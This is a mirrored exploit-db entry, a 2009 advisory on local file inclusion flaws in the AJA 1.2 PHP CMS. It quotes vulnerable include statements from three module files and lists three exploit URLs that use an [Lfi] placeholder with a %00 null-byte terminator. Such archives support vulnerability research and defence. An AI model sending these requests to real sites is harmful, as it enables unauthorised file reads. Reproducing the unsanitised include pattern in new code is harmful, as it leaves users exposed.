bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/7939.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

50 lines
No EOL
1.7 KiB
Text
Raw Blame History

-------------:multi local file include:------------
---------------
script:AJA 1.2
------------------------------------------------------------------
download from:http://www.magtrb.com/en/modules.php?name=Downloads&op=getit&lid=6
------------------------------------------------------------------
........................................................
vul1: \modules\Contact_Plus\admin\case.php line 14:
if (!stristr($_SERVER['SCRIPT_NAME'], "".$admin_file.".php")) { die ("Access Denied"); }
$module_name = "Contact_Plus";
include_once("modules/$module_name/admin/language/lang-".$currentlang.".php"); line 14
...............
vul2: /modules/Fancy_NewsLetter/admin/includes/FANCYNLOptions.php line 2:
require_once('modules/'.$module_name.'/admin/includes/Modules/Banners.php'); line2
...............
vul3: /modules/Reviews/admin/case.php line 14:
if (!eregi("".$admin_file.".php", $_SERVER['SCRIPT_NAME'])) { die ("Access Denied"); }
$module_name = "Reviews";
include_once("modules/$module_name/admin/language/lang-".$currentlang.".php"); line 14
-----------------------------------------------------
-----------------------------------------------------
xpl:
http://127.0.0.1/path/modules/Contact_Plus/admin/case.php?currentlang=[Lfi]%00
http://127.0.0.1/path/modules/Fancy_NewsLetter/admin/includes/FANCYNLOptions.php?module_name=[Lfi]%00
http://127.0.0.1/path/modules/Reviews/admin/case.php?currentlang=[Lfi]%00
***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]
from[iran-tehran]
---------------------------------------------------
# milw0rm.com [2009-02-02]
Reference in a new issue View git blame Copy permalink